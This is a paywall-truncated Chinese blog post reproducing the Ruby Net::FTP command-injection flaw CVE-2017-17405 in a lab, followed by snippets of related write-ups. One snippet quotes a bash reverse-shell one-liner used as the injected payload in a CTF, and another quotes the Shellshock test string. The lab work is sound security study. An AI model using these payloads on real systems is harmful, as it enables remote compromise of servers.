CVE-2017-17405（Ruby Net::FTP 模块命令注入漏洞）复现

kriesa

已于 2022-07-13 10:44:21 修改

阅读量1.2k

点赞数

分类专栏：漏洞复现文章标签： web安全网络安全

于 2022-07-13 10:12:59 首次发布

本文链接：https://blog.youkuaiyun.com/kriesa/article/details/125758035

版权

本文介绍了Ruby Net::FTP模块中的CVE-2017-17405命令注入漏洞，详细阐述了漏洞原理，并通过复现过程展示如何利用该漏洞。在复现过程中，通过构造特定请求，成功触发漏洞并在服务器端创建文件，进一步展示了如何通过注入命令反弹shell。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Ruby Net::FTP 模块命令注入漏洞（CVE-2017-17405）

一介绍：

Ruby Net::FTP 模块是一个 FTP 客户端，在上传和下载文件的过程中，打开本地文件时使用了 open 函数。而在 ruby 中，open 函数是借用系统命令来打开文件，且没用过滤 shell 字符，导致在用户控制文件名的情况下，将可以注入任意命令。

二复现：

环境启动后，访问 http://your-ip:8080/ 将可以看到一个 HTTP 服务。这个 HTTP 服务的作用是，我们访问 http://your-ip:8080/download?uri=ftp://example.com:2121/&file=vulhub.txt，它会从 example.com:2121 这个 ftp 服务端下载文件 vulhub.txt 到本地，并将内容返回给用户。

因为这是一个 FTP 客户端的漏洞，所以我们需要先运行一个可以被访问到的服务端。比如使用 python：

# 安装pyftpdlib

pip install pyftpdlib

# 在当前目录下启动

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kriesa

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)

weixin_44632654的博客

10-17

380

2.4.3之前的Ruby允许Net :: FTP命令注入。

生产漏洞修复总结

duanbiren123的博客

07-08

5650

参与评论您还未登录，请先登录后发表或查看评论

CVE-2017-17405漏洞复现

HEAVEN569的博客

02-14

1351

一、漏洞简述 Ruby Net::FTP 模块是一个FTP客户端，在上传和下载文件的过程中，打开本地文件时使用了open函数。而在ruby中，open函数是借用系统命令来打开文件，且没用过滤shell字符，导致在用户控制文件名的情况下，将可以注入任意命令。 Net:：FTP#get、getbinaryfile、gettextfile、put、putbinaryfile和puttextfile使用Kernel#open打开本地文件。如果localfile参数以管道字符“|”开头，则执行管道字符后面的命令。

Ruby Net::FTP 模块命令注入漏洞（CVE-2017-17405）漏洞复现

weixin_51804748的博客

01-17

2167

漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端，在上传和下载文件的过程中，打开本地文件时使用了 open 函数。而在 ruby 中，open 函数是借用系统命令来打开文件，且没用过滤 shell 字符，导致在用户控制文件名的情况下，将可以注入任意命令。 Vulhub（CVE-2017-17405）环境搭建靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405

Ruby Net::FTP 模块命令注入漏洞（CVE-2017-17405）

EC_Carrot的博客

07-26

467

漏洞简介 Net::FTP是其中的一个FTP客户端的实现。 Ruby 2.4.3之前的版本中的Net::FTP存在命令注入漏洞。在上传和下载文件的过程中，打开本地文件时使用了open函数。而在ruby中，open函数是借用系统命令来打开文件，且没用过滤shell字符，导致在用户控制文件名的情况下，将可以注入任意命令。漏洞复现访问http://your-ip:8080/将可以看到一个HTTP服务，其作用是，假如我们访问http://your-ip:8080/download?uri=ftp://examp

Ruby NetFTP 模块命令注入漏洞（CVE-2017-17405）

黑白的博客

12-14

1226

声明好好学习，天天向上漏洞描述 Ruby Net::FTP 模块是一个FTP客户端，在上传和下载文件的过程中，打开本地文件时使用了open函数。而在ruby中，open函数是借用系统命令来打开文件，且没用过滤shell字符，导致在用户控制文件名的情况下，将可以注入任意命令。影响范围 Ruby 2.2系列：2.2.8及更早版本 Ruby 2.3系列：2.3.5及更早版本 Ruby 2.4系列：2.4.2及更早版本 Ruby 2.5系列：2.5.0-preview1 在主干修订版r61242之前复现

CVE-2017-7269漏洞复现MSF模块使用教程

CVE-2017-7269 是一个特定的安全漏洞编号，其详细信息涉及在Microsoft IIS网络服务器上运行的一个远程代码执行漏洞。该漏洞允许攻击者远程利用受影响的系统执行任意代码。CVE-2017-7269 漏洞是在Microsoft IIS 6.0 ...

春秋云境CVE-2017-17405

最新发布

shr592833253的博客

05-07

414

bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode，最后带入payload对应的位置。复现该漏洞需要我们自己起一个ftp服务，这里推荐用python的pyftpdlib，没有安装的小伙伴，可以现在自己的vps上安装一下。burpsuit重放一下请求包，vps成功反弹出shell，拿到flag!值得注意的是，得关注自己的vps有没有开启2121这个端口。，然后再进行urlencode编码，也就是，随后我们进入靶场，发现如下界面。

Ruby NetFTP模块命令注入(CVE-2017-17405)

m0_65150886的博客

01-16

778

Ruby Net::FTP 模块是一个 FTP 客户端，在上传和下载文件的过程中，打开本地文件时使用了 open 函数。而在 ruby 中，open 函数是借用系统命令来打开文件，且没有过滤 shell 字符，导致在用户控制文件名的情况下，将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞。

漏洞复现----14、Ruby On Rails 路径穿越漏洞（CVE-2018-3760）

七天

11-08

1461

文章目录一、Ruby on Rails 简介二、漏洞简介1、Sprockets简介三、漏洞复现一、Ruby on Rails 简介 Ruby on Rails（官方简称为 Rails，亦被简称为 RoR），是一个使用 Ruby 语言写的开源 Web 应用框架，它是严格按照 MVC 结构开发的。它努力使自身保持简单，来使实际的应用开发时的代码更少，使用最少的配置。 Rails 的设计原则包括 “不做重复的事”（Don’t Repeat Yourself）和 “惯例优于设置”（Convention Ove

linux ftp漏洞利用,tnftp ftp客户端任意命令执行漏洞(CVE-2014-8517)

weixin_34800530的博客

05-05

699

发布日期：2014-10-29更新日期：2014-10-30受影响系统：NetBSD tnftp描述：CVE(CAN) ID: CVE-2014-8517tnftp是广泛使用的NetBSD FTP客户端。tnftp存在安全漏洞导致攻击者可以执行任意命令。此漏洞影响多个版本Linux(Fedora, Debian, NetBSD, FreeBSD, OpenBSD)及Apple Yosemite 1...

Ruby之————访问 FTP

ShanDong_Chu

08-18

3843

访问FTP ： 1）FTP 是目前最为流行的网络存储和发布文件的方式。FTP协议支持通过匿名方式或账户方式远程登录FTP服务器，列出服务器发布的文件列表，浏览目录结构以及上传、下载和删除服务器磁盘上的文件。 幻灯片 6 .O {font-size:149%;} <!--.sld {left:0px !important; width:6.0in !important; height:4.5

热门Ruby 库中存在严重的命令注入漏洞

smellycat000的专栏

04-11

428

Net::FTP

少点套路，多点诚意

05-19

1149

#!/usr/bin/perl -w # file: ftp_recent.pl # Figure 6.1: Downloading a single file with Net::FTP use Net::FTP; use constant HOST => 'ftp.perl.org'; use constant DIR => '/pub/CPAN'; use constant FILE =

使用ruby写了一个根据ftp服务器列表自动遍历所有服务器查找对应的东东

xiaopei的博客

04-05

2686

前在ftp上下载一个东西，需要查找很多ftp-server，累～今日学习ruby,使用ruby写了一个对应给定的ftp_list和需要查找的东东，比如lost 越狱等，遍历ftp_list里面的所有服务器，如果找到，打印服务器名和对应的路径。不过感觉效率不是很好，高手完善一下 require "net/ftp" class FTPDownload def initialize(ip_ad

如何通过路由器日志查看路由器是否断网过_TPLink路由器被曝严重漏洞，远程攻击者无需密码即可登录...

weixin_39822443的博客

11-22

1236

当你遇到网络卡顿或者断网的情况，第一反应可能就是选择重启路由器。但如果你发现无法以管理员权限重新设置路由器。那么很有可能是你的路由器被劫持了。TP-Link路由器被接管近期，TP-Link曝光一个严重漏洞，漏洞编号为CVE-2017-7405，CVE评分为9.8分，潜在的攻击者利用此漏洞可完全接管路由器，导致受害者无法使用管理员密码正常登录。具体是如何实现的呢？首先是利用该漏洞，通过局域...

Bash安全漏洞——通过专门制作的环境变量注入漏洞

weixin_34088838的博客

09-25

213

Bash安全漏洞——通过专门制作的环境变量注入漏洞2014-09-25，早上，看到群上和红帽的网站上出现bash的安全漏洞，所以要赶快升级bash的版本。新版本：确保了，不允许在命令结束后，执行一个bash函数。测试漏洞：[root@ ~]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"...

CVE-2017-0199漏洞复现与研究

空旷在远方

09-22

7110

1引言 1.1微软office漏洞背景微软Office系统软件（Word/Excel/PowerPoint等），一直是电脑上最为常用的办公软件之一，在国内外都拥有大量的用户。另一方面，利用Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段，广泛运用于APT攻击，抓肉鸡，传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”：黑客将包含漏洞的文档伪装成为一个正常的Office文档，并精心构...